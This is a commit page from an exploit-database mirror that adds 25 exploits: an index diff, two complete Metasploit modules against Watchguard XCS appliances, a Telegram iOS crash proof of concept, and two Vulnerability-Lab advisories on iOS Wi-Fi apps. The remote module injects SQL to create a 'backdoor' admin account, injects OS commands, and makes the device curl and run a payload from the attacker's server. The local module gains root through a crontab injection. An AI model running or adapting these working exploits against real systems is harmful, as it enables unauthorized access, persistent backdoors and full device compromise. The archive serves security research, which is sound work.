bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-29

Browse source 
25 new exploits
This commit is contained in:
Offensive Security 2015-09-29 05:03:06 +00:00
parent 8583dd2305
commit 24fffa54a2
26 changed files with 2021 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
files.csv
View file

@ -34612,3 +34612,28 @@ id,file,description,date,author,platform,type,port
38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - CSRF Vulnerability",2015-09-25,Portcullis,php,webapps,80
38322,platforms/php/webapps/38322.txt,"CKEditor 'posteddata.php' Cross Site Scripting Vulnerability",2013-02-19,AkaStep,php,webapps,0
38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80
38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin Cross Site Scripting Vulnerability",2013-02-20,hiphop,php,webapps,0
38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery Vulnerability",2013-02-18,QSecure,windows,remote,0
38326,platforms/php/webapps/38326.txt,"Zenphoto 'index.php' SQL Injection Vulnerability",2013-02-20,HosseinNsn,php,webapps,0
38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 Local File Disclosure and Cross Site Scripting Vulnerabilities",2013-02-21,TheMirkin,php,webapps,0
38328,platforms/php/webapps/38328.txt,"OpenEMR 'site' Parameter Cross Site Scripting Vulnerability",2013-02-21,"Gjoko Krstic",php,webapps,0
38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x 'id' Parameter Cross Site Scripting Vulnerability",2013-02-20,MustLive,php,webapps,0
38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0
38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0
38332,platforms/php/webapps/38332.txt,"Batavi 'index.php' Cross Site Scripting Vulnerability",2013-03-01,Dognaedis,php,webapps,0
38333,platforms/php/webapps/38333.txt,"phpMyRecipes Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0
38334,platforms/jsp/webapps/38334.txt,"JForum 'jforum.page' Multiple Cross Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0
38335,platforms/php/webapps/38335.txt,"Geeklog Cross Site Scripting Vulnerability",2013-02-27,"High-Tech Bridge",php,webapps,0
38336,platforms/windows/dos/38336.py,"Git-1.9.5 ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash PoC",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80
38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
38340,platforms/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal Vulnerability",2015-09-28,"Jay Turla",windows,remote,21
38341,platforms/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability",2015-09-28,"Jay Turla",windows,remote,21
38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include Vulnerability",2015-09-28,Vulnerability-Lab,ios,webapps,8080
38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload Vulnerability",2015-09-28,Vulnerability-Lab,ios,webapps,0
38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass Vulnerability",2015-09-28,"Reigning Shells",windows,dos,0
38345,platforms/php/webapps/38345.txt,"Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80
38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,metasploit,bsd,remote,443
38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,metasploit,bsd,local,443
38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector.<uint> Capacity Field",2015-09-28,"Google Security Research",windows,dos,0

Can't render this file because it is too large.

102
platforms/bsd/local/38347.rb Executable file
View file

@ -0,0 +1,102 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
# It needs 3 minutes wait time
# WfsDelay set to 180, so it should be a Manual exploit,
# to avoid it being included in automations
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
by root's crontab which can be exploited to run a command as root within 3 minutes.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' => { 'WfsDelay' => 180 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
end
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end
def check
#Basic check to see if the device is a Watchguard XCS
res = cmd_exec('uname -a')
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
Exploit::CheckCode::Safe
end
def upload_payload
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
write_file(fname, @pl)
return nil unless file_exist?(fname)
cmd_exec("chmod +x #{fname}")
fname
end
def exploit
print_warning('Rooting can take up to 3 minutes.')
#Generate and upload the payload
filename = upload_payload
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
print_status("Payload #{filename} uploaded.")
#Sets up empty dummy file needed for privesc
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
cmd_exec("touch #{dummy_filename}")
vprint_status('Added dummy file')
#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)
#Cleanup the files we used
register_file_for_cleanup('/var/tmp/badqids')
register_file_for_cleanup(dummy_filename)
register_file_for_cleanup(filename)
end
end

280
platforms/bsd/remote/38346.rb Executable file
View file

@ -0,0 +1,280 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS Remote Command Execution',
'Description' => %q{
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
remote attacker may insert a valid web user into the appliance database, and get access
to the web interface. On the other hand, a vulnerability in the web interface allows the
attacker to inject operating system commands as the 'nobody' user.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']),
OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
#Check to see if the SQLi is present
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1'"
})
if res && res.body && res.body.include?('unterminated quoted string')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# Get a valid session by logging in or exploiting SQLi to add user
print_status('Getting a valid session...')
@sid = get_session
print_status('Successfully logged in')
# Check if cmd injection works
test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
# We have cmd exec, stand up an HTTP server and deliver the payload
vprint_status('Getting ready to drop binary on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def attempt_login(username, pwd_clear)
#Attempts to login with the provided user credentials
#Get the login page
get_login_hash = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl')
})
unless get_login_hash && get_login_hash.body
fail_with(Failure::Unreachable, 'Could not get login page.')
end
#Find the hash token needed to login
login_hash = ''
get_login_hash.body.each_line do |line|
next if line !~ /name="hash" value="(.*)"/
login_hash = $1
break
end
sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
if login_hash == '' || sid_cookie == ''
fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
end
login_post = {
'u' => "#{username}",
'pwd' => "#{pwd_clear}",
'hash' => login_hash,
'login' => 'Login'
}
print_status('Attempting to login with provided credentials')
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl'),
'method' => 'POST',
'encode_params' => false,
'cookie' => "sid=#{sid_cookie}",
'vars_post' => login_post,
'vars_get' => {
'f' => 'V'
}
})
unless login && login.body && login.body.include?('<title>Loading...</title>')
return nil
end
sid_cookie
end
def add_user(user_id, username, pwd_hash, pwd_clear)
#Adds a user to the database using the unauthed SQLi
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
})
unless res && res.body
fail_with(Failure::Unreachable, "Could not connect to host")
end
if res.body.include?('ERROR: duplicate key value violates unique constraint')
print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
true
end
def generate_device_hash(cleartext_password)
#Generates the specific hashes needed for the XCS
pre_salt = 'BorderWare '
post_salt = ' some other random (9) stuff'
hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
final_hash
end
def send_cmd_exec(uri, os_cmd, blocking = true)
#This is a handler function that makes HTTP calls to exploit the command injection issue
unless @sid
fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
end
opts = {
'uri' => normalize_uri(target_uri.path, "#{uri}"),
'cookie' => "sid=#{@sid}",
'encode_params' => true,
'vars_get' => {
'f' => 'dnld',
'id' => ";#{os_cmd}"
}
}
if blocking
res = send_request_cgi(opts)
else
res = send_request_cgi(opts, 1)
end
#Handle cmd exec failures
if res.nil? && blocking
fail_with(Failure::Unknown, 'Failed to exploit command injection.')
end
res
end
def get_session
#Gets a valid login session, either valid creds or the SQLi vulnerability
username = datastore['WATCHGUARD_USER']
pwd_clear = datastore['WATCHGUARD_PASSWORD']
user_id = rand(999)
sid_cookie = attempt_login(username, pwd_clear)
return sid_cookie unless sid_cookie.nil?
vprint_error('Failed to login, attempting to add backdoor user...')
pwd_hash = generate_device_hash(pwd_clear)
unless add_user(user_id, username, pwd_hash, pwd_clear)
fail_with(Failure::Unknown, 'Failed to add user account to database.')
end
sid_cookie = attempt_login(username, pwd_clear)
unless sid_cookie
fail_with(Failure::Unknown, 'Unable to login with user account.')
end
sid_cookie
end
# Make the server download the payload and run it
def primer
vprint_status('Primer hook called, make the server get and run exploit')
#Gets the autogenerated uri from the mixin
payload_uri = get_uri
filename = rand_text_alpha_lower(8)
print_status("Sending download request for #{payload_uri}")
download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
vprint_status("Telling appliance to run #{download_cmd}")
send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)
register_file_for_cleanup("/tmp/#{filename}")
chmod_cmd = "chmod +x /tmp/#{filename}"
vprint_status('Chmoding the payload...')
send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
exec_cmd = "/tmp/#{filename}"
vprint_status('Running the payload...')
send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end

65
platforms/ios/dos/38337.txt Executable file
View file

@ -0,0 +1,65 @@
#[+] Title: Telegram - Input Length Handling Denial of Service Vulnerability
#[+] Product: Telegram
#[+] Vendor: http://telegram.org/
#[+] SoftWare Link : https://itunes.apple.com/en/app/telegram-messenger/id686449807?mt=8
#[+] Vulnerable Version(s): Telegram 3.2 on IOS 9.0.1
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#Demo : https://youtu.be/fszP8jyJN0M
# 1. open your phone contacts / add contact
# 2. Past 5000 X “A” in your contact name / save contact
# 3. Open telegram and goto “Contact"
# 4. Crashed ;)
Debug Report
{"app_name":"Telegram","timestamp":”2015-xx-xx","app_version":"3.2":"ph.telegra.Telegraph","share_with_app_devs":false,"is_first_party":false"os_version":"iPhone OS 9.0.1 (13A404)","name":"Telegram"}
Incident Identifier: xxxxx xxxxx xxxxx xxxxx xxxxx xxxxx
CrashReporter Key: 7e3613t9t457ge3a2en22fc58e7rr44r49311297
Hardware Model: iPhone6,1
Process: Telegram [616]
Path: /private/var/mobile/Containers/Bundle/Application/xxxxx xxxxx xxxxx xxxxx xxxxx xxxxx/Telegram.app/Telegram
Identifier: ph.telegra.Telegraph
Code Type: ARM-64 (Native)
Parent Process: launchd [1]
Date/Time: 2015-xx-xx 03:12:02.02
Launch Time: 2015-xx-xx 23:03:12.12
OS Version: iOS 9.0.1 (13A404)
Exception Type: EXC_CRASH (SIGILL)
Exception Codes: 0x0000000000000000, 0x0000000000000000
Exception Note: EXC_CORPSE_NOTIFY
Triggered by Thread: 0
Filtered syslog:
None found
Thread 0 name: Dispatch queue: com.apple.main-thread
Thread 0 Crashed:
0 libsystem_kernel.dylib 0x000000019b578c30 0x19b578000 + 3120
1 libsystem_kernel.dylib 0x000000019b578aac 0x19b578000 + 2732
2 CoreFoundation 0x0000000186100168 0x186024000 + 901480
3 CoreFoundation 0x00000001860fde6c 0x186024000 + 892524
4 CoreFoundation 0x000000018602cdc0 0x186024000 + 36288
5 GraphicsServices 0x0000000191180088 0x191174000 + 49288
6 UIKit 0x000000018b706f60 0x18b68c000 + 503648
7 Telegram 0x0000000100016f70 0x100000000 + 94064
8 libdyld.dylib 0x000000019b4768b8 0x19b474000 + 10424
Activity ID: 0x0000000000042ea5
Activity Name: send control actions
Activity Image Path: /System/Library/Frameworks/UIKit.framework/UIKit
Activity Offset: 0x00032b34
Activity Running Time: 0.980331 sec

212
platforms/ios/webapps/38342.txt Executable file
View file

@ -0,0 +1,212 @@
Document Title:
===============
My.WiFi USB Drive v1.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1589
Release Date:
=============
2015-09-24
Vulnerability Laboratory ID (VL-ID):
====================================
1589
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
My WiFi USB drive. Files can be uploaded with any browser. Start the WiFi Drive web server from application and connect to it using any browser.
Use the iPod/iPhones/iPad`s available disk space to carry any files. Use your iPhone as a normal shared network drive!
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/my.wifi-usb-drive-+-free-pdf/id979512705 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a local file include vulnerability in the official My.WiFi USB Drive v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Jiyeon Lee
Product: My.WiFi USB Drive - iOS Mobile (Web-Application) 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official My.WiFi USB Drive v1.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload Files` module. Remote attackers are able to inject own files with malicious
`filename` values in the `Upload Files` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable upload files POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the local file include web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload Files
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost/)
Proof of Concept (PoC):
=======================
The file include web vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Source
<tr class="row-file">
<td class="column-icon">
<button type="button" class="btn btn-default btn-xs button-open">
<span class="glyphicon glyphicon-folder-open"></span>
</button>
</td>
<td class="column-name"><p title="Click to rename..."
class="edit">"./[LOCAL FILE INCLUDE VULNERABILITY!]></p></td>
<td class="column-size">
--- PoC Session Logs [POST] ---
13:08:40.079[167ms][total 167ms] Status: 200[OK]
POST http://localhost:8080/upload Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Content-Length[820]
Content-Type[multipart/form-data; boundary=---------------------------20192471318021]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------20192471318021
Content-Disposition: form-data; name="path"
/
-----------------------------20192471318021
Content-Disposition: form-data; name="files[]"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
Content-Type: image/png
---
13:08:42.198[75ms][total 75ms] Status: 200[OK]
GET http://localhost:8080/list?path=%2F[LOCAL FILE INCLUDE VULNERABILITY]2.png Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[692] Mime Type[application/json]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[692]
Content-Type[application/json]
Connection[Close]
Date[Tue, 01 Sep 2015 11:17:22 GMT]
Reference(s):
http://localhost:8080/upload
http://localhost:8080/list?path=%2F
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks.
Security Risk:
==============
The security risk of the local file include web vulnerability in the My.WiFi USB Drive app is estimated as high. (CVSS 7.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

188
platforms/ios/webapps/38343.txt Executable file
View file

@ -0,0 +1,188 @@
Document Title:
===============
Photos in Wifi v1.0.1 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2015-09-28
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
8.6
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, and album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing 100`s of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiples full resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an arbitrary file upload web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to upload an arbitrary (malicious) file to compromise the iOS wifi web-application.
The arbitrary file upload vulnerability is located in `Select a photo or a video to upload` module. Remote attackers are able to intercept
the vulnerable `filename` value in the `upload > submit` POST method request to compromise the mobile device or interface app. The attacker
can use a live session tamper for http to change the `filename` value to a webshell. After the upload the attacker requests the
`asset.php` file to execute the stored malicious file. The encoding of the `ext` value and the parse of the `filename` value is broken
which results obviously in this type behavior. The injection point of the issue is the upload POST method request with the vulnerable
filename value. The execution point occurs in the `assets.php` file when processing to display the images or videos. The upload file path
execution is not restricted (flag) and helps an attacker in case of exploitation to easily upload or access webshells.
Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account.
Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The arbitrary file upload vulnerability can be exploited by remote attackers without privilege web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and login by requesting via http localhost
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject to the filename value a webshell code
7. Continue to reply the request
8. The server responds with 200OK
9. Open the poc url of the path to execute the webshell to compromise the mobile device or mobile app
10. Successful reproduce of the arbitrary file upload vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=php
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[466583] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!]2.[ext]"
Content-Type: html
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sa., 12 Sep. 2015 11:23:51 GMT]
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the wifi interface upload post method request is estimated as high. (CVSS 8.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
